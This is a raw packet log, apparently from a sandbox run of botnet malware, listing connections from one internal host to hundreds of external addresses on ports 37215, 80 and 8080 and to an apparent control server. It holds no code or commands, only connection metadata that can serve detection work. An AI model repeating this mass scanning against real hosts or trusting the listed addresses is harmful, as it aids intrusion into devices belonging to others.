                                                      Feb 14, 2024 09:28:44.609221935 CET8080675295.252.138.120192.168.2.15
                                                      Feb 14, 2024 09:28:44.612485886 CET80784095.86.100.228192.168.2.15
                                                      Feb 14, 2024 09:28:44.612571955 CET784080192.168.2.1595.86.100.228
                                                      Feb 14, 2024 09:28:44.612643003 CET8080675295.43.239.21192.168.2.15
                                                      Feb 14, 2024 09:28:44.612745047 CET67528080192.168.2.1595.43.239.21
                                                      Feb 14, 2024 09:28:44.618844032 CET8080675262.105.132.133192.168.2.15
                                                      Feb 14, 2024 09:28:44.620691061 CET8080675285.206.81.249192.168.2.15
                                                      Feb 14, 2024 09:28:44.623397112 CET8080675294.120.32.187192.168.2.15
                                                      Feb 14, 2024 09:28:44.623490095 CET67528080192.168.2.1594.120.32.187
                                                      Feb 14, 2024 09:28:44.625488997 CET8080675262.29.47.155192.168.2.15
                                                      Feb 14, 2024 09:28:44.625546932 CET67528080192.168.2.1562.29.47.155
                                                      Feb 14, 2024 09:28:44.629775047 CET102438980141.98.10.72192.168.2.15
                                                      Feb 14, 2024 09:28:44.629831076 CET389801024192.168.2.15141.98.10.72
                                                      Feb 14, 2024 09:28:44.630224943 CET389801024192.168.2.15141.98.10.72
                                                      Feb 14, 2024 09:28:44.650755882 CET8080675294.43.15.247192.168.2.15
                                                      Feb 14, 2024 09:28:44.653067112 CET8080675295.156.252.134192.168.2.15
                                                      Feb 14, 2024 09:28:44.680921078 CET8080675294.74.123.186192.168.2.15
                                                      Feb 14, 2024 09:28:44.710874081 CET231184112.180.173.50192.168.2.15
                                                      Feb 14, 2024 09:28:44.718086004 CET232311841.248.131.225192.168.2.15
                                                      Feb 14, 2024 09:28:44.749270916 CET23118483.245.221.40192.168.2.15
                                                      Feb 14, 2024 09:28:44.776014090 CET23118436.93.229.211192.168.2.15
                                                      Feb 14, 2024 09:28:44.850929022 CET102438980141.98.10.72192.168.2.15
                                                      Feb 14, 2024 09:28:44.851022005 CET389801024192.168.2.15141.98.10.72
                                                      Feb 14, 2024 09:28:45.071779966 CET102438980141.98.10.72192.168.2.15
                                                      Feb 14, 2024 09:28:45.286825895 CET809637215192.168.2.15157.46.217.79
                                                      Feb 14, 2024 09:28:45.286844969 CET809637215192.168.2.15157.132.13.175
                                                      Feb 14, 2024 09:28:45.286844969 CET809637215192.168.2.15157.208.9.25
                                                      Feb 14, 2024 09:28:45.286845922 CET809637215192.168.2.15157.177.51.198
                                                      Feb 14, 2024 09:28:45.286844969 CET809637215192.168.2.15157.26.42.65
                                                      Feb 14, 2024 09:28:45.286859035 CET809637215192.168.2.15157.70.42.132
                                                      Feb 14, 2024 09:28:45.286863089 CET809637215192.168.2.15157.78.13.73
                                                      Feb 14, 2024 09:28:45.286865950 CET809637215192.168.2.15157.241.150.185
                                                      Feb 14, 2024 09:28:45.286895990 CET809637215192.168.2.15157.184.30.206
                                                      Feb 14, 2024 09:28:45.286910057 CET809637215192.168.2.15157.163.116.196
                                                      Feb 14, 2024 09:28:45.286911964 CET809637215192.168.2.15157.63.72.50
                                                      Feb 14, 2024 09:28:45.286933899 CET809637215192.168.2.15157.74.10.66
                                                      Feb 14, 2024 09:28:45.286952972 CET809637215192.168.2.15157.229.102.83
                                                      Feb 14, 2024 09:28:45.286964893 CET809637215192.168.2.15157.128.217.185
                                                      Feb 14, 2024 09:28:45.286981106 CET809637215192.168.2.15157.127.141.131
                                                      Feb 14, 2024 09:28:45.287000895 CET809637215192.168.2.15157.84.229.133
                                                      Feb 14, 2024 09:28:45.287020922 CET809637215192.168.2.15157.214.108.200
                                                      Feb 14, 2024 09:28:45.287020922 CET809637215192.168.2.15157.142.100.166
                                                      Feb 14, 2024 09:28:45.287026882 CET809637215192.168.2.15157.166.21.130
                                                      Feb 14, 2024 09:28:45.287039995 CET809637215192.168.2.15157.23.85.160
                                                      Feb 14, 2024 09:28:45.287066936 CET809637215192.168.2.15157.42.39.121
                                                      Feb 14, 2024 09:28:45.287066936 CET809637215192.168.2.15157.64.49.108
                                                      Feb 14, 2024 09:28:45.287100077 CET809637215192.168.2.15157.107.253.27
                                                      Feb 14, 2024 09:28:45.287141085 CET809637215192.168.2.15157.116.141.244
                                                      Feb 14, 2024 09:28:45.287146091 CET809637215192.168.2.15157.117.226.117
                                                      Feb 14, 2024 09:28:45.287175894 CET809637215192.168.2.15157.125.131.176
                                                      Feb 14, 2024 09:28:45.287180901 CET809637215192.168.2.15157.104.120.13
                                                      Feb 14, 2024 09:28:45.287206888 CET809637215192.168.2.15157.144.66.114
                                                      Feb 14, 2024 09:28:45.287220955 CET809637215192.168.2.15157.225.137.196
                                                      Feb 14, 2024 09:28:45.287250996 CET809637215192.168.2.15157.7.200.95
                                                      Feb 14, 2024 09:28:45.287257910 CET809637215192.168.2.15157.181.255.155
                                                      Feb 14, 2024 09:28:45.287272930 CET809637215192.168.2.15157.38.50.243
                                                      Feb 14, 2024 09:28:45.287343979 CET809637215192.168.2.15157.151.247.10
                                                      Feb 14, 2024 09:28:45.287343979 CET809637215192.168.2.15157.43.128.215
                                                      Feb 14, 2024 09:28:45.287344933 CET809637215192.168.2.15157.158.160.134
                                                      Feb 14, 2024 09:28:45.287354946 CET809637215192.168.2.15157.157.122.177
                                                      Feb 14, 2024 09:28:45.287354946 CET809637215192.168.2.15157.1.236.77
                                                      Feb 14, 2024 09:28:45.287364006 CET809637215192.168.2.15157.38.25.235
                                                      Feb 14, 2024 09:28:45.287414074 CET809637215192.168.2.15157.89.129.158
                                                      Feb 14, 2024 09:28:45.287431955 CET809637215192.168.2.15157.75.148.167
                                                      Feb 14, 2024 09:28:45.287441969 CET809637215192.168.2.15157.53.160.208
                                                      Feb 14, 2024 09:28:45.287465096 CET809637215192.168.2.15157.237.133.35
                                                      Feb 14, 2024 09:28:45.287465096 CET809637215192.168.2.15157.125.162.105
                                                      Feb 14, 2024 09:28:45.287482977 CET809637215192.168.2.15157.38.254.53
                                                      Feb 14, 2024 09:28:45.287491083 CET809637215192.168.2.15157.69.202.37
                                                      Feb 14, 2024 09:28:45.287518978 CET809637215192.168.2.15157.86.238.35
                                                      Feb 14, 2024 09:28:45.287523031 CET809637215192.168.2.15157.144.144.152
                                                      Feb 14, 2024 09:28:45.287554026 CET809637215192.168.2.15157.149.230.80
                                                      Feb 14, 2024 09:28:45.287575006 CET809637215192.168.2.15157.226.55.159
                                                      Feb 14, 2024 09:28:45.287590981 CET809637215192.168.2.15157.32.44.8
                                                      Feb 14, 2024 09:28:45.287619114 CET809637215192.168.2.15157.107.136.53
                                                      Feb 14, 2024 09:28:45.287619114 CET809637215192.168.2.15157.178.22.4
                                                      Feb 14, 2024 09:28:45.287633896 CET809637215192.168.2.15157.25.76.253
                                                      Feb 14, 2024 09:28:45.287646055 CET809637215192.168.2.15157.103.75.196
                                                      Feb 14, 2024 09:28:45.287664890 CET809637215192.168.2.15157.50.196.145
                                                      Feb 14, 2024 09:28:45.287664890 CET809637215192.168.2.15157.220.177.203
                                                      Feb 14, 2024 09:28:45.287691116 CET809637215192.168.2.15157.3.11.233
                                                      Feb 14, 2024 09:28:45.287699938 CET809637215192.168.2.15157.124.253.149
                                                      Feb 14, 2024 09:28:45.287704945 CET809637215192.168.2.15157.247.34.16
                                                      Feb 14, 2024 09:28:45.287725925 CET809637215192.168.2.15157.216.233.248
                                                      Feb 14, 2024 09:28:45.287736893 CET809637215192.168.2.15157.204.203.70
                                                      Feb 14, 2024 09:28:45.287755966 CET809637215192.168.2.15157.59.192.57
                                                      Feb 14, 2024 09:28:45.287781000 CET809637215192.168.2.15157.244.72.155
                                                      Feb 14, 2024 09:28:45.287784100 CET809637215192.168.2.15157.52.31.250
                                                      Feb 14, 2024 09:28:45.287817955 CET809637215192.168.2.15157.54.199.46
                                                      Feb 14, 2024 09:28:45.287825108 CET809637215192.168.2.15157.145.247.210
                                                      Feb 14, 2024 09:28:45.287867069 CET809637215192.168.2.15157.104.22.10
                                                      Feb 14, 2024 09:28:45.287869930 CET809637215192.168.2.15157.178.12.81
                                                      Feb 14, 2024 09:28:45.287904978 CET809637215192.168.2.15157.183.66.187
                                                      Feb 14, 2024 09:28:45.287904978 CET809637215192.168.2.15157.15.159.68
                                                      Feb 14, 2024 09:28:45.287950039 CET809637215192.168.2.15157.31.241.12
                                                      Feb 14, 2024 09:28:45.287980080 CET809637215192.168.2.15157.138.12.38
                                                      Feb 14, 2024 09:28:45.288011074 CET809637215192.168.2.15157.217.99.41
                                                      Feb 14, 2024 09:28:45.288039923 CET809637215192.168.2.15157.65.220.180
                                                      Feb 14, 2024 09:28:45.288063049 CET809637215192.168.2.15157.216.215.38
                                                      Feb 14, 2024 09:28:45.288065910 CET809637215192.168.2.15157.155.138.194
                                                      Feb 14, 2024 09:28:45.288105011 CET809637215192.168.2.15157.154.220.127
                                                      Feb 14, 2024 09:28:45.288106918 CET809637215192.168.2.15157.117.225.7
                                                      Feb 14, 2024 09:28:45.288106918 CET809637215192.168.2.15157.130.114.96
                                                      Feb 14, 2024 09:28:45.288106918 CET809637215192.168.2.15157.59.16.215
                                                      Feb 14, 2024 09:28:45.288106918 CET809637215192.168.2.15157.155.34.29
                                                      Feb 14, 2024 09:28:45.288121939 CET809637215192.168.2.15157.219.18.225
                                                      Feb 14, 2024 09:28:45.288121939 CET809637215192.168.2.15157.4.225.122
                                                      Feb 14, 2024 09:28:45.288186073 CET809637215192.168.2.15157.158.52.172
                                                      Feb 14, 2024 09:28:45.288192034 CET809637215192.168.2.15157.151.222.236
                                                      Feb 14, 2024 09:28:45.288220882 CET809637215192.168.2.15157.126.109.132
                                                      Feb 14, 2024 09:28:45.288223982 CET809637215192.168.2.15157.55.130.79
                                                      Feb 14, 2024 09:28:45.288264036 CET809637215192.168.2.15157.212.88.247
                                                      Feb 14, 2024 09:28:45.288264036 CET809637215192.168.2.15157.216.25.48
                                                      Feb 14, 2024 09:28:45.288269997 CET809637215192.168.2.15157.233.3.74
                                                      Feb 14, 2024 09:28:45.288285017 CET809637215192.168.2.15157.48.141.45
                                                      Feb 14, 2024 09:28:45.288307905 CET809637215192.168.2.15157.169.97.86
                                                      Feb 14, 2024 09:28:45.288311958 CET809637215192.168.2.15157.58.221.154
                                                      Feb 14, 2024 09:28:45.288326025 CET809637215192.168.2.15157.153.183.30
                                                      Feb 14, 2024 09:28:45.288378000 CET809637215192.168.2.15157.230.121.219
                                                      Feb 14, 2024 09:28:45.288383961 CET809637215192.168.2.15157.93.255.14
                                                      Feb 14, 2024 09:28:45.288388968 CET809637215192.168.2.15157.85.99.171
                                                      Feb 14, 2024 09:28:45.288408995 CET809637215192.168.2.15157.112.70.201
                                                      Feb 14, 2024 09:28:45.288472891 CET809637215192.168.2.15157.6.215.220
                                                      Feb 14, 2024 09:28:45.288475990 CET809637215192.168.2.15157.81.169.136
                                                      Feb 14, 2024 09:28:45.288494110 CET809637215192.168.2.15157.199.177.122
                                                      Feb 14, 2024 09:28:45.288500071 CET809637215192.168.2.15157.254.4.51
                                                      Feb 14, 2024 09:28:45.288500071 CET809637215192.168.2.15157.120.109.42
                                                      Feb 14, 2024 09:28:45.288533926 CET809637215192.168.2.15157.133.214.159
                                                      Feb 14, 2024 09:28:45.288558960 CET809637215192.168.2.15157.160.100.170
                                                      Feb 14, 2024 09:28:45.288574934 CET809637215192.168.2.15157.34.231.119
                                                      Feb 14, 2024 09:28:45.288587093 CET809637215192.168.2.15157.89.6.109
                                                      Feb 14, 2024 09:28:45.288587093 CET809637215192.168.2.15157.39.154.164
                                                      Feb 14, 2024 09:28:45.288589001 CET809637215192.168.2.15157.82.47.253
                                                      Feb 14, 2024 09:28:45.288599968 CET809637215192.168.2.15157.24.154.31
                                                      Feb 14, 2024 09:28:45.288633108 CET809637215192.168.2.15157.7.118.74
                                                      Feb 14, 2024 09:28:45.288671017 CET809637215192.168.2.15157.55.127.9
                                                      Feb 14, 2024 09:28:45.288671017 CET809637215192.168.2.15157.230.61.242
                                                      Feb 14, 2024 09:28:45.288710117 CET809637215192.168.2.15157.182.119.220
                                                      Feb 14, 2024 09:28:45.288714886 CET809637215192.168.2.15157.82.88.214
                                                      Feb 14, 2024 09:28:45.288728952 CET809637215192.168.2.15157.111.124.8
                                                      Feb 14, 2024 09:28:45.288752079 CET809637215192.168.2.15157.171.219.0
                                                      Feb 14, 2024 09:28:45.288753033 CET809637215192.168.2.15157.141.181.52
                                                      Feb 14, 2024 09:28:45.288795948 CET809637215192.168.2.15157.116.42.6
                                                      Feb 14, 2024 09:28:45.288799047 CET809637215192.168.2.15157.18.62.131
                                                      Feb 14, 2024 09:28:45.288801908 CET809637215192.168.2.15157.31.83.60
                                                      Feb 14, 2024 09:28:45.288815022 CET809637215192.168.2.15157.248.89.32
                                                      Feb 14, 2024 09:28:45.288840055 CET809637215192.168.2.15157.142.59.240
                                                      Feb 14, 2024 09:28:45.288846970 CET809637215192.168.2.15157.188.67.252
                                                      Feb 14, 2024 09:28:45.288871050 CET809637215192.168.2.15157.49.1.251
                                                      Feb 14, 2024 09:28:45.288876057 CET809637215192.168.2.15157.223.119.167
                                                      Feb 14, 2024 09:28:45.288885117 CET809637215192.168.2.15157.189.249.152
                                                      Feb 14, 2024 09:28:45.288913012 CET809637215192.168.2.15157.131.113.116
                                                      Feb 14, 2024 09:28:45.288913012 CET809637215192.168.2.15157.203.14.113
                                                      Feb 14, 2024 09:28:45.288949966 CET809637215192.168.2.15157.235.216.200
                                                      Feb 14, 2024 09:28:45.288950920 CET809637215192.168.2.15157.250.45.170
                                                      Feb 14, 2024 09:28:45.288970947 CET809637215192.168.2.15157.184.239.217
                                                      Feb 14, 2024 09:28:45.288970947 CET809637215192.168.2.15157.38.54.127
                                                      Feb 14, 2024 09:28:45.289005995 CET809637215192.168.2.15157.27.252.10
                                                      Feb 14, 2024 09:28:45.289007902 CET809637215192.168.2.15157.95.4.39
                                                      Feb 14, 2024 09:28:45.289036036 CET809637215192.168.2.15157.205.255.173
                                                      Feb 14, 2024 09:28:45.289038897 CET809637215192.168.2.15157.229.25.236
                                                      Feb 14, 2024 09:28:45.289076090 CET809637215192.168.2.15157.117.152.246
                                                      Feb 14, 2024 09:28:45.289124966 CET809637215192.168.2.15157.23.142.9
                                                      Feb 14, 2024 09:28:45.289124966 CET809637215192.168.2.15157.96.255.202
                                                      Feb 14, 2024 09:28:45.289149046 CET809637215192.168.2.15157.178.245.252
                                                      Feb 14, 2024 09:28:45.289169073 CET809637215192.168.2.15157.232.144.18
                                                      Feb 14, 2024 09:28:45.289180040 CET809637215192.168.2.15157.81.37.195
                                                      Feb 14, 2024 09:28:45.289200068 CET809637215192.168.2.15157.44.35.1
                                                      Feb 14, 2024 09:28:45.289215088 CET809637215192.168.2.15157.18.222.226
                                                      Feb 14, 2024 09:28:45.289241076 CET809637215192.168.2.15157.189.208.117
                                                      Feb 14, 2024 09:28:45.289248943 CET809637215192.168.2.15157.150.126.144
                                                      Feb 14, 2024 09:28:45.289316893 CET809637215192.168.2.15157.70.30.166
                                                      Feb 14, 2024 09:28:45.289330959 CET809637215192.168.2.15157.8.5.24
                                                      Feb 14, 2024 09:28:45.289351940 CET809637215192.168.2.15157.244.43.211
                                                      Feb 14, 2024 09:28:45.289355993 CET809637215192.168.2.15157.186.25.94
                                                      Feb 14, 2024 09:28:45.289371014 CET809637215192.168.2.15157.131.188.165
                                                      Feb 14, 2024 09:28:45.289371967 CET809637215192.168.2.15157.94.114.88
                                                      Feb 14, 2024 09:28:45.289386988 CET809637215192.168.2.15157.32.181.210
                                                      Feb 14, 2024 09:28:45.289391994 CET809637215192.168.2.15157.240.137.111
                                                      Feb 14, 2024 09:28:45.289427042 CET809637215192.168.2.15157.178.146.2
                                                      Feb 14, 2024 09:28:45.289427996 CET809637215192.168.2.15157.197.215.76
                                                      Feb 14, 2024 09:28:45.289442062 CET809637215192.168.2.15157.120.171.8
                                                      Feb 14, 2024 09:28:45.289469957 CET809637215192.168.2.15157.14.133.209
                                                      Feb 14, 2024 09:28:45.289572001 CET809637215192.168.2.15157.112.215.96
                                                      Feb 14, 2024 09:28:45.362660885 CET784080192.168.2.1588.58.254.12
                                                      Feb 14, 2024 09:28:45.362690926 CET784080192.168.2.1588.103.78.52
                                                      Feb 14, 2024 09:28:45.362692118 CET784080192.168.2.1588.161.198.169
                                                      Feb 14, 2024 09:28:45.362728119 CET784080192.168.2.1588.25.1.144
                                                      Feb 14, 2024 09:28:45.362746000 CET784080192.168.2.1588.135.38.139
                                                      Feb 14, 2024 09:28:45.362783909 CET784080192.168.2.1588.182.216.251
                                                      Feb 14, 2024 09:28:45.362807035 CET784080192.168.2.1588.251.211.96
                                                      Feb 14, 2024 09:28:45.362808943 CET784080192.168.2.1588.233.196.78
                                                      Feb 14, 2024 09:28:45.362808943 CET784080192.168.2.1588.4.137.197
                                                      Feb 14, 2024 09:28:45.362808943 CET784080192.168.2.1588.199.55.49
                                                      Feb 14, 2024 09:28:45.362811089 CET784080192.168.2.1588.114.4.155
                                                      Feb 14, 2024 09:28:45.362811089 CET784080192.168.2.1588.205.223.219
                                                      Feb 14, 2024 09:28:45.362831116 CET784080192.168.2.1588.245.2.157
                                                      Feb 14, 2024 09:28:45.362845898 CET784080192.168.2.1588.191.218.1
                                                      Feb 14, 2024 09:28:45.362859964 CET784080192.168.2.1588.106.83.83
                                                      Feb 14, 2024 09:28:45.362874031 CET784080192.168.2.1588.140.18.198
                                                      Feb 14, 2024 09:28:45.362878084 CET784080192.168.2.1588.43.156.123
                                                      Feb 14, 2024 09:28:45.362879992 CET784080192.168.2.1588.190.53.6
                                                      Feb 14, 2024 09:28:45.362935066 CET784080192.168.2.1588.155.172.83
                                                      Feb 14, 2024 09:28:45.362951994 CET784080192.168.2.1588.12.52.177
                                                      Feb 14, 2024 09:28:45.362951994 CET784080192.168.2.1588.116.106.149
                                                      Feb 14, 2024 09:28:45.362962008 CET784080192.168.2.1588.40.146.122
                                                      Feb 14, 2024 09:28:45.362994909 CET784080192.168.2.1588.38.24.234
                                                      Feb 14, 2024 09:28:45.363007069 CET784080192.168.2.1588.131.178.88
                                                      Feb 14, 2024 09:28:45.363014936 CET784080192.168.2.1588.105.167.227
                                                      Feb 14, 2024 09:28:45.363014936 CET784080192.168.2.1588.227.1.138
                                                      Feb 14, 2024 09:28:45.363040924 CET784080192.168.2.1588.208.217.109
                                                      Feb 14, 2024 09:28:45.363040924 CET784080192.168.2.1588.89.248.13
                                                      Feb 14, 2024 09:28:45.363071918 CET784080192.168.2.1588.64.185.114
                                                      Feb 14, 2024 09:28:45.363091946 CET784080192.168.2.1588.194.28.149
                                                      Feb 14, 2024 09:28:45.363102913 CET784080192.168.2.1588.221.78.210
                                                      Feb 14, 2024 09:28:45.363133907 CET784080192.168.2.1588.201.7.212
                                                      Feb 14, 2024 09:28:45.363137007 CET784080192.168.2.1588.154.6.19
                                                      Feb 14, 2024 09:28:45.363159895 CET784080192.168.2.1588.59.10.93
                                                      Feb 14, 2024 09:28:45.363162041 CET784080192.168.2.1588.122.81.7
                                                      Feb 14, 2024 09:28:45.363184929 CET784080192.168.2.1588.29.122.139
                                                      Feb 14, 2024 09:28:45.363184929 CET784080192.168.2.1588.164.26.10
                                                      Feb 14, 2024 09:28:45.363192081 CET784080192.168.2.1588.213.17.93
                                                      Feb 14, 2024 09:28:45.363229036 CET784080192.168.2.1588.100.198.75
                                                      Feb 14, 2024 09:28:45.363253117 CET784080192.168.2.1588.118.190.172
                                                      Feb 14, 2024 09:28:45.363256931 CET784080192.168.2.1588.10.182.254
                                                      Feb 14, 2024 09:28:45.363256931 CET784080192.168.2.1588.75.150.210
                                                      Feb 14, 2024 09:28:45.363269091 CET784080192.168.2.1588.32.0.102
                                                      Feb 14, 2024 09:28:45.363277912 CET784080192.168.2.1588.105.25.120
                                                      Feb 14, 2024 09:28:45.363301039 CET784080192.168.2.1588.52.26.84
                                                      Feb 14, 2024 09:28:45.363337040 CET784080192.168.2.1588.169.108.55
                                                      Feb 14, 2024 09:28:45.363338947 CET784080192.168.2.1588.41.214.234
                                                      Feb 14, 2024 09:28:45.363348961 CET784080192.168.2.1588.138.147.161
                                                      Feb 14, 2024 09:28:45.363374949 CET784080192.168.2.1588.13.114.90
                                                      Feb 14, 2024 09:28:45.363393068 CET784080192.168.2.1588.72.95.54
                                                      Feb 14, 2024 09:28:45.363400936 CET784080192.168.2.1588.152.145.200
                                                      Feb 14, 2024 09:28:45.363409042 CET784080192.168.2.1588.25.198.69
                                                      Feb 14, 2024 09:28:45.363421917 CET784080192.168.2.1588.4.240.150
                                                      Feb 14, 2024 09:28:45.363451004 CET784080192.168.2.1588.187.130.81
                                                      Feb 14, 2024 09:28:45.363466978 CET784080192.168.2.1588.75.109.132
                                                      Feb 14, 2024 09:28:45.363468885 CET784080192.168.2.1588.7.27.171
                                                      Feb 14, 2024 09:28:45.363504887 CET784080192.168.2.1588.157.39.38
                                                      Feb 14, 2024 09:28:45.363523960 CET784080192.168.2.1588.84.145.24
                                                      Feb 14, 2024 09:28:45.363528013 CET784080192.168.2.1588.119.98.130
                                                      Feb 14, 2024 09:28:45.363531113 CET784080192.168.2.1588.27.251.177
                                                      Feb 14, 2024 09:28:45.363538980 CET784080192.168.2.1588.177.83.199
                                                      Feb 14, 2024 09:28:45.363553047 CET784080192.168.2.1588.109.15.40
                                                      Feb 14, 2024 09:28:45.363555908 CET784080192.168.2.1588.71.81.237
                                                      Feb 14, 2024 09:28:45.363569975 CET784080192.168.2.1588.90.208.22
                                                      Feb 14, 2024 09:28:45.363599062 CET784080192.168.2.1588.135.130.142
                                                      Feb 14, 2024 09:28:45.363617897 CET784080192.168.2.1588.193.39.143
                                                      Feb 14, 2024 09:28:45.363636971 CET784080192.168.2.1588.140.126.177
                                                      Feb 14, 2024 09:28:45.363639116 CET784080192.168.2.1588.226.36.189
                                                      Feb 14, 2024 09:28:45.363639116 CET784080192.168.2.1588.165.63.183
                                                      Feb 14, 2024 09:28:45.363646030 CET784080192.168.2.1588.14.85.84
                                                      Feb 14, 2024 09:28:45.363682985 CET784080192.168.2.1588.199.253.226
                                                      Feb 14, 2024 09:28:45.363699913 CET784080192.168.2.1588.54.187.121
                                                      Feb 14, 2024 09:28:45.363715887 CET784080192.168.2.1588.175.87.209
                                                      Feb 14, 2024 09:28:45.363760948 CET784080192.168.2.1588.235.218.102
                                                      Feb 14, 2024 09:28:45.363809109 CET784080192.168.2.1588.238.67.77
                                                      Feb 14, 2024 09:28:45.363816023 CET784080192.168.2.1588.40.114.231
                                                      Feb 14, 2024 09:28:45.363828897 CET784080192.168.2.1588.178.200.99
                                                      Feb 14, 2024 09:28:45.363838911 CET784080192.168.2.1588.234.241.115
                                                      Feb 14, 2024 09:28:45.363861084 CET784080192.168.2.1588.117.82.3
                                                      Feb 14, 2024 09:28:45.363890886 CET784080192.168.2.1588.8.212.71
                                                      Feb 14, 2024 09:28:45.363895893 CET784080192.168.2.1588.190.147.75
                                                      Feb 14, 2024 09:28:45.363910913 CET784080192.168.2.1588.193.110.151
                                                      Feb 14, 2024 09:28:45.363941908 CET784080192.168.2.1588.141.92.150
                                                      Feb 14, 2024 09:28:45.363953114 CET784080192.168.2.1588.93.41.168
                                                      Feb 14, 2024 09:28:45.363953114 CET784080192.168.2.1588.160.9.249
                                                      Feb 14, 2024 09:28:45.363962889 CET784080192.168.2.1588.219.212.122
                                                      Feb 14, 2024 09:28:45.363984108 CET784080192.168.2.1588.115.243.159
                                                      Feb 14, 2024 09:28:45.363991022 CET784080192.168.2.1588.10.195.10
                                                      Feb 14, 2024 09:28:45.364010096 CET784080192.168.2.1588.21.22.220
                                                      Feb 14, 2024 09:28:45.364032984 CET784080192.168.2.1588.94.140.230
                                                      Feb 14, 2024 09:28:45.364033937 CET784080192.168.2.1588.44.35.12
                                                      Feb 14, 2024 09:28:45.364033937 CET784080192.168.2.1588.158.43.87
                                                      Feb 14, 2024 09:28:45.364053965 CET784080192.168.2.1588.49.85.195
                                                      Feb 14, 2024 09:28:45.364087105 CET784080192.168.2.1588.71.138.224
                                                      Feb 14, 2024 09:28:45.364104033 CET784080192.168.2.1588.33.93.255
                                                      Feb 14, 2024 09:28:45.364118099 CET784080192.168.2.1588.134.188.102
                                                      Feb 14, 2024 09:28:45.364118099 CET784080192.168.2.1588.2.182.44
                                                      Feb 14, 2024 09:28:45.364121914 CET784080192.168.2.1588.36.9.188
                                                      Feb 14, 2024 09:28:45.364125967 CET784080192.168.2.1588.123.91.57
                                                      Feb 14, 2024 09:28:45.364139080 CET784080192.168.2.1588.13.58.205
                                                      Feb 14, 2024 09:28:45.364144087 CET784080192.168.2.1588.107.191.208
                                                      Feb 14, 2024 09:28:45.364166021 CET784080192.168.2.1588.94.71.5
                                                      Feb 14, 2024 09:28:45.364186049 CET784080192.168.2.1588.8.223.0
                                                      Feb 14, 2024 09:28:45.364186049 CET784080192.168.2.1588.245.28.30
                                                      Feb 14, 2024 09:28:45.364186049 CET784080192.168.2.1588.253.81.108
                                                      Feb 14, 2024 09:28:45.364227057 CET784080192.168.2.1588.143.117.85
                                                      Feb 14, 2024 09:28:45.364234924 CET784080192.168.2.1588.27.136.136
                                                      Feb 14, 2024 09:28:45.364255905 CET784080192.168.2.1588.74.242.168
                                                      Feb 14, 2024 09:28:45.364264965 CET784080192.168.2.1588.44.190.82
                                                      Feb 14, 2024 09:28:45.364284039 CET784080192.168.2.1588.83.216.90
                                                      Feb 14, 2024 09:28:45.364295006 CET784080192.168.2.1588.102.23.190
                                                      Feb 14, 2024 09:28:45.364308119 CET784080192.168.2.1588.74.82.36
                                                      Feb 14, 2024 09:28:45.364314079 CET784080192.168.2.1588.37.25.143
                                                      Feb 14, 2024 09:28:45.364314079 CET784080192.168.2.1588.7.164.224
                                                      Feb 14, 2024 09:28:45.364335060 CET784080192.168.2.1588.29.114.145
                                                      Feb 14, 2024 09:28:45.364350080 CET784080192.168.2.1588.60.105.156
                                                      Feb 14, 2024 09:28:45.364350080 CET784080192.168.2.1588.25.64.93
                                                      Feb 14, 2024 09:28:45.364373922 CET784080192.168.2.1588.123.124.87
                                                      Feb 14, 2024 09:28:45.364376068 CET784080192.168.2.1588.75.177.123
                                                      Feb 14, 2024 09:28:45.364401102 CET784080192.168.2.1588.235.56.142
                                                      Feb 14, 2024 09:28:45.364403009 CET784080192.168.2.1588.207.112.3
                                                      Feb 14, 2024 09:28:45.364428997 CET784080192.168.2.1588.188.217.252
                                                      Feb 14, 2024 09:28:45.364430904 CET784080192.168.2.1588.57.15.248
                                                      Feb 14, 2024 09:28:45.364449978 CET784080192.168.2.1588.117.210.74
                                                      Feb 14, 2024 09:28:45.364455938 CET784080192.168.2.1588.141.93.11
                                                      Feb 14, 2024 09:28:45.364478111 CET784080192.168.2.1588.30.147.0
                                                      Feb 14, 2024 09:28:45.364478111 CET784080192.168.2.1588.141.168.173
                                                      Feb 14, 2024 09:28:45.364497900 CET784080192.168.2.1588.214.230.202
                                                      Feb 14, 2024 09:28:45.364506006 CET784080192.168.2.1588.243.171.193
                                                      Feb 14, 2024 09:28:45.364525080 CET784080192.168.2.1588.49.50.63
                                                      Feb 14, 2024 09:28:45.364531040 CET784080192.168.2.1588.125.9.136
                                                      Feb 14, 2024 09:28:45.364540100 CET784080192.168.2.1588.164.206.38
                                                      Feb 14, 2024 09:28:45.364557981 CET784080192.168.2.1588.118.52.177
                                                      Feb 14, 2024 09:28:45.364574909 CET784080192.168.2.1588.146.223.77
                                                      Feb 14, 2024 09:28:45.364598989 CET784080192.168.2.1588.170.197.195
                                                      Feb 14, 2024 09:28:45.364628077 CET784080192.168.2.1588.168.234.39
                                                      Feb 14, 2024 09:28:45.364629984 CET784080192.168.2.1588.81.251.152
                                                      Feb 14, 2024 09:28:45.364635944 CET784080192.168.2.1588.81.170.82
                                                      Feb 14, 2024 09:28:45.364635944 CET784080192.168.2.1588.149.181.115
                                                      Feb 14, 2024 09:28:45.364650965 CET784080192.168.2.1588.196.51.155
                                                      Feb 14, 2024 09:28:45.364667892 CET784080192.168.2.1588.141.209.163
                                                      Feb 14, 2024 09:28:45.364681959 CET784080192.168.2.1588.56.22.76
                                                      Feb 14, 2024 09:28:45.364698887 CET784080192.168.2.1588.119.167.115
                                                      Feb 14, 2024 09:28:45.364701986 CET784080192.168.2.1588.109.53.204
                                                      Feb 14, 2024 09:28:45.364723921 CET784080192.168.2.1588.106.76.7
                                                      Feb 14, 2024 09:28:45.364723921 CET784080192.168.2.1588.225.211.71
                                                      Feb 14, 2024 09:28:45.364752054 CET784080192.168.2.1588.195.140.219
                                                      Feb 14, 2024 09:28:45.364763021 CET784080192.168.2.1588.144.121.120
                                                      Feb 14, 2024 09:28:45.364784002 CET784080192.168.2.1588.251.19.189
                                                      Feb 14, 2024 09:28:45.364804983 CET784080192.168.2.1588.208.47.155
                                                      Feb 14, 2024 09:28:45.364805937 CET784080192.168.2.1588.164.158.151
                                                      Feb 14, 2024 09:28:45.364811897 CET784080192.168.2.1588.167.75.195
                                                      Feb 14, 2024 09:28:45.364828110 CET784080192.168.2.1588.249.88.53
                                                      Feb 14, 2024 09:28:45.364844084 CET784080192.168.2.1588.89.49.83
                                                      Feb 14, 2024 09:28:45.364861012 CET784080192.168.2.1588.166.173.206
                                                      Feb 14, 2024 09:28:45.364876986 CET784080192.168.2.1588.9.216.60
                                                      Feb 14, 2024 09:28:45.364902020 CET784080192.168.2.1588.90.232.249
                                                      Feb 14, 2024 09:28:45.364931107 CET784080192.168.2.1588.58.111.124
                                                      Feb 14, 2024 09:28:45.364931107 CET784080192.168.2.1588.14.97.247
                                                      Feb 14, 2024 09:28:45.365068913 CET784080192.168.2.1588.82.88.68
